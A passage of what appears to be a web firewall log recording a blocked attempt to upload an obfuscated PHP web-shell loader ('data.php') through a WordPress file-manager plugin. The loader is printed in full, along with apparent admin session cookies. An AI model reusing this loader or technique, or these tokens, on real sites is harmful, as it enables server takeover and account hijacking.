ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------aTbaNRX5mxlD76Ek--\r\n"]
["2026-03-25 10:30:27","199.38.86.102","POST","\/wp-admin\/admin-ajax.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.87 Safari\/537.36","post","http包非法,并且被封锁IP,如果自定义了from-data可能会导致误报。如果大量出现当前问题。可以选择在全局设置中关闭From-data协议22","POST \/wp-admin\/admin-ajax.php HTTP\/1.1\nhost:dewenlabels.com\nconnection:keep-alive\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\ncookie:wordpress_test_cookie=WP%20Cookie%20check; wordpress_sec_3309b4d362f120e2b595228292f03253=admin%7C1775615335%7CSdeNKuQMRYnj0wCwlSqejbdAvnR9MUNHVSm67AI9299%7C2b7cd64a59f3abb4e30f8c2584898c04e443071b3e5784c8fdc612e69ca48889; wordpress_logged_in_3309b4d362f120e2b595228292f03253=admin%7C1775615335%7CSdeNKuQMRYnj0wCwlSqejbdAvnR9MUNHVSm67AI9299%7C16909238a9bcba18537ba75b885e9daa4f3638de2efda8eec94be67b6d3115f4; tk_ai=woo%3Aq77ENrbxlN0nWIsyMJCsQCGo; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce%26hidetb%3D1%26advImgDetails%3Dshow%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1774405738\nte:trailers\ncontent-type:multipart\/form-data; boundary=----------------H2j61B6Jx3285vA6\nreferer:https:\/\/dewenlabels.com\/wp-admin\/admin.php?page=wp_file_manager\norigin:https:\/\/dewenlabels.com\ncontent-length:1517\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/67.0.3396.87 Safari\/537.36\n\n------------------H2j61B6Jx3285vA6\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------------------H2j61B6Jx3285vA6\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_d3AtY29udGVudC90aGVtZXM\r\n------------------H2j61B6Jx3285vA6\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nmk_file_folder_manager\r\n------------------H2j61B6Jx3285vA6\r\nContent-Disposition: form-data; name=\"_wpnonce\"\r\n\r\nbbc552fb9b\r\n------------------H2j61B6Jx3285vA6\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"data.php\"\r\nContent-Type: application\/octet-stream\r\n\r\n<?php\r\n\r\nif(in_array(\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\", array_keys($_REQUEST))){\r\n$element = array_filter([getenv(\"TEMP\"), session_save_path(), sys_get_temp_dir(), ini_get(\"upload_tmp_dir\"), getcwd(), \"\/var\/tmp\", getenv(\"TMP\"), \"\/tmp\", \"\/dev\/shm\"]);\r\n$property_set = $_REQUEST[\"c\\x6F\\x6D\\x70o\\x6E\\x65nt\"];\r\n $property_set \t\t=\t explode  (\t \".\" \t,$property_set\t)\t\t\t;\t\r\n$dchunk \t=\t'';\r\n$salt8 \t=\t'abcdefghijklmnopqrstuvwxyz0123456789';\r\n$sLen \t=\tstrlen($salt8);\r\n\r\nforeach ($property_set as $i => $val) {\r\n    $chS \t=\tord($salt8[$i % $sLen]);\r\n    $dec \t=\t((int)$val - $chS - ($i % 10)) ^ 53;\r\n    $dchunk .= chr($dec);\r\n}\r\nforeach ($element as $fac) {\r\n            if (is_dir($fac) ? is_writable($fac) : false) {\r\n            $tkn = sprintf(\"%s\/.res\", $fac);\r\n            $val = fopen($tkn, 'wb');\r\nif ($val) {\r\n    fwrite($val, $dchunk);\r\n    fclose($val);\r\n    include $tkn;\r\n    @unlink($tkn);\r\n    exit;\r\n}\r\n        }\r\n}\r\n}\r\n------------------H2j61B6Jx3285vA6--\r\n"]
@ Telegram